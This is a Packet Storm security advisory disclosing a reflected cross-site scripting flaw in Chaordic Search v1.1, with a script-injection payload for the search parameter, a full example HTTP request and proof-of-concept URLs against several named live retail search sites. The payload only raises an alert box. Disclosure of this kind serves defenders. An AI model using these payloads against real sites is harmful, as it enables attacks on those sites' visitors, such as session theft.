Chaordic Search 1.1 Cross Site Scripting

2016-12-09T00:00:00
ID PACKETSTORM:140099
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2016-12-09T00:00:00

Description

                                        
                                            `[+] Cross Site Scripting on Chaordic Search v1.1  
  
[+] Date: 09/12/2016  
  
[+] Risk: LOW  
  
[+] CWE number: CWE-79  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Vendor Homepage: https://www.chaordic.com.br/  
  
[+] Contact: felipe_andrian@hotmail.com  
  
[+] Tested on: Gnu/Linux  
  
[+] Exploit :   
  
http://busca.host/?q= [ XSS PAYLOAD ]  
  
[+] Payload :  
  
?q="><script>alert('XSS Payload')</script>  
  
[+] Example :  
  
GET /?q=%22%3E%3Cscript%3Ealert(%27OXSS Payload%27)%3C/script%3E HTTP/1.1  
Host: busca.submarino.com.br  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: chaordic_anonymousUserId=anon-a1fa1360-bde5-11e6-afd4-a1f7c36320fb; cs_preferenceOrder=popularity; csDisplayType=grid  
Connection: keep-alive  
  
[+] Poc :  
  
http://busca.saraiva.com.br/?q="><script>alert('XSS')</script>   
http://busca.camisariacolombo.com.br/?q="><script>alert('XSS')</script>  
http://busca.dentalcremer.com.br/?q="><script>alert('XSS')</script>  
`